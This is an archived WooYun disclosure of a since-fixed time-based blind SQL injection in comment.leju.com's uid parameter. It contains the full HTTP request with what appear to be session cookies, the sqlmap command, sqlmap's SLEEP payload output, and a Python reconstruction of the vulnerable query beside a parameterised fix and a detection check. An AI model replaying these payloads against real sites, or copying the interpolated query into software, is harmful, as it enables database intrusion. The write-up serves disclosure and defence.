WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
2016-04-23: Details have been sent to the vendor and are awaiting handling
2016-04-24: The vendor has confirmed the issue; details are disclosed only to the vendor
2016-04-25: The vendor has fixed the vulnerability and chose to disclose it; details are now public
SQL injection
Injection parameter: uid
~~~
GET /api/comment/getcomment?callback=jsonp_278cgunw7w6imyb&key=1dd7374509225e5abf1484a8d0965aef&unique_id=6129070685173370162&uid=2970574011* HTTP/1.1
Host: comment.leju.com
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Accept-Encoding: gzip, deflate, sdch
Host: comment.leju.com
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36
Connection: keep-alive
Referer: http://hf.leju.com/news/2016-04-22/08186129070685173370162.shtml
Cookie: M_AUTH=bcf97a064686696b03c5be538b6759fe74a9086b; M_USER=eNpdj8GKAjEMhp%2BmXoQl7bRNcuhhdAoWtlWnncOcZGbcZXEfYNGn3ypeFAL%2FT%2FKFP1nF0xA6pxjBoAYpV7WRfZ%2Fa6J3wKFiLloS3gkhs8IU77PbJu2p8bMPn3eQxl1AX4QMkKcUAa6kNEUgGU%2Bchl13oOzfe%2BstYjtd4%2B0lDAR4vv9f4J5qu1gPL%2B6Hfeoeap7mZLdlGWQJr4YxoiSUa%2BUVSPdhNSJ1b9DJp1dAEM1dRcF4WAzzZbzSkeb4fF1L7%2Fmp5Bql%2F1hZEWg%3D%3D; M_KEY=YmNhNzljMjFZbW91WW1KekxtaHZkWE5sTG5OcGJtRXVZMjl0TG1OdVh6RTBOVGc0T0Rnek1EVT0yZGY4; M_INFO=%7B%22uid%22%3A%222970574011%22%2C%22username%22%3A%22%5Cu7528%5Cu62372970574011%22%2C%22isThird%22%3Atrue%2C%22phone%22%3A%22%22%2C%22headurl%22%3A%22http%3A%5C%2F%5C%2Fp4.sinaimg.cn%5C%2F2970574011%5C%2F180%22%2C%22iscard%22%3Afalse%7D; M_UID=2970574011; M_ITSOURCE=749ab3b68632680660d776891751e812; M_SPRING=YzRjYTQyMzhNUT09YjkyMw%3D%3D; M_TICKET=NGU5ZDc4Y2RZbW91WW1KekxtaHZkWE5sTG5OcGJtRXVZMjl0TG1OdVh6RTBOVGc0TURFNU1EVmZNamszTURVM05EQXhNUT09ZWE5Yw%3D%3D; pgv_pvi=1220687872; city=wh; wapparam=wap2web; citypub=wh; extern_host=hf.leju.com; gatheruuid=56f63df72a5ab810
~~~
The request above was saved to 1.txt and passed to sqlmap with -r; the trailing `*` after the uid value marks the injection point, and --technique=T restricts testing to time-based blind payloads:

~~~
sqlmap -r 1.txt --dbms=mysql --current-db --technique=T
~~~
~~~
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://comment.leju.com:80/api/comment/getcomment?callback=jsonp_278cgunw7w6imyb&key=1dd7374509225e5abf1484a8d0965aef&unique_id=6129070685173370162&uid=2970574011') AND (SELECT * FROM (SELECT(SLEEP(5)))sslJ) AND ('lITm'='lITm
---
[22:49:28] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[22:49:57] [INFO] confirming MySQL
[22:49:57] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[22:50:37] [INFO] adjusting time delay to 4 seconds due to good response times
[22:50:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[22:50:37] [INFO] fetching current database
[22:50:37] [INFO] retrieved: comment_leju_com
current database: 'comment_leju_com'
[23:09:23] [INFO] fetched data logged to text files under '/Users/null0z/.sqlmap/output/comment.leju.com'
~~~
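The closing `')` in sqlmap's payload implies the uid value was pasted into the SQL text inside quotes and parentheses. The following added example (my own reconstruction in Python with an in-memory SQLite table, not leju.com's code or schema; the table layout and query shape are assumptions) contrasts that flawed pattern with a parameterised query, shows why only the flawed one leaks a true/false bit per request, and adds a small log-review check for the MySQL delay functions such payloads rely on:

```python
import sqlite3
from urllib.parse import unquote_plus

# Probe pair with the same structure as the page's payload (the SLEEP() branch is
# replaced by a true/false comparison because SQLite has no SLEEP()).
TRUE_PROBE = "2970574011') AND ('lITm'='lITm"
FALSE_PROBE = "2970574011') AND ('lITm'='XXXX"


def make_db():
    """Constructed in-memory stand-in for a comment table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE comment (id INTEGER PRIMARY KEY, uid TEXT, body TEXT)")
    conn.executemany("INSERT INTO comment (uid, body) VALUES (?, ?)",
                     [("2970574011", "first"), ("2970574011", "second"), ("1", "other")])
    return conn


def get_comments_vulnerable(conn, uid):
    """Hypothetical reconstruction of the flawed pattern: uid is interpolated
    into the SQL string inside ('...'), so a quote in uid escapes the literal."""
    sql = "SELECT body FROM comment WHERE uid IN ('%s') ORDER BY id" % uid
    return [row[0] for row in conn.execute(sql)]


def get_comments_safe(conn, uid):
    """Hardened version: uid is bound as a parameter and never parsed as SQL."""
    rows = conn.execute("SELECT body FROM comment WHERE uid IN (?) ORDER BY id", (uid,))
    return [row[0] for row in rows]


def blind_oracle_differs(fetch, conn):
    """True when the true/false probes give different results, i.e. the endpoint
    leaks one bit per request (the primitive behind blind SQL injection)."""
    return fetch(conn, TRUE_PROBE) != fetch(conn, FALSE_PROBE)


def is_time_based_probe(query_string):
    """Log-review / WAF-style check: flag MySQL delay functions in a query string
    after URL decoding, since sqlmap sends the payload percent-encoded."""
    decoded = unquote_plus(query_string).upper()
    return "SLEEP(" in decoded or "BENCHMARK(" in decoded


if __name__ == "__main__":
    db = make_db()
    print("vulnerable endpoint leaks a bit:", blind_oracle_differs(get_comments_vulnerable, db))
    print("parameterised endpoint leaks a bit:", blind_oracle_differs(get_comments_safe, db))
    print(is_time_based_probe("uid=2970574011%27%29+AND+%28SELECT%28SLEEP%285%29%29%29"))
```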
Severity: High
Vulnerability rank: 10
Confirmed: 2016-04-24 13:49
Thank you very much for your attention to Leju.
2016-04-25: The vulnerability has been fixed; thanks again.